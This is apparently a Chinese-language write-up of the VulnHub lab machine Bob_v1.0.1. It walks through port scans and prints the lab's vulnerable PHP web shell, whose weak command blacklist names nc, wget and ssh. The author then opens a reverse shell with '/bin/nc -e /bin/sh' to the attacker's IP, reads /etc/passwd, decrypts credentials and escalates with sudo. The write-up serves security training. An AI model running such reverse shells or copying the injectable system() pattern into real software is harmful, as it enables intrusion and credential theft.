[vulnhub] Bob_v1.0.1
首先先扫描一波端口
namp -sS 192.168.127.0/24
发现打开了 80端口
map scan report for 192.168.127.128
Host is up (0.00059s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:E0:3F:33 (VMware)
访问网站
屏幕快照 2018-07-06 下午6.44.58
一开始访问啥思路都没有=。=
想起之前nikto扫了一波
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.127.128
+ Target Hostname: 192.168.127.128
+ Target Port: 80
+ Start Time: 2018-07-06 18:38:39 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-07-06 18:39:01 (GMT8) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
进入http://192.168.127.128/dev_shell.php
屏幕快照 2018-07-06 下午8.41.31
http://192.168.127.128/passwords.html
屏幕快照 2018-07-06 下午8.43.48
http://192.168.127.128/lat_memo.html
屏幕快照 2018-07-06 下午6.44.58
使用lsattr可以看到很多东西
-w1280
将dev_shell.php.bak下载下来
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
可以看到里面有黑名单存在
"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"
还好不是正则匹配,采取调用里面的nc来进行回显
很简单可以掏出bin里面的可执行文件来执行
/bin/nc -e /bin/sh 192.168.127.1 4444
美化界面python -c 'import pty;pty.spawn("/bin/bash")'
先看一下/etc/passwd
发现有一个bob的用户
进入 /home/bob 会发现有一个serect的文件夹
和login.txt.gpg是gpg加密过的
一直往Serect里面往下翻有一个藏头诗
HARPOCRATES拿这个解密
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
本地是不能解密的要求root权限只能通过nc传文件
nc -lvp 1235 > login.txt.gpg 接收端
nc -w 3 192.168.107.129 1235 < login.txt.gpg 发送端
收到之后再次解密
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
apple@ckj123 ~/hexo gpg --batch --passphrase HARPOCRATES -d login.txt.gpg ✔ 12:18:33
gpg: AES 加密过的数据
gpg: 以 1 个密码加密
bob:b0bcat_
得到密码
sudo cat flag.txt
屏幕快照 2018-07-07 下午12.26.38
网友评论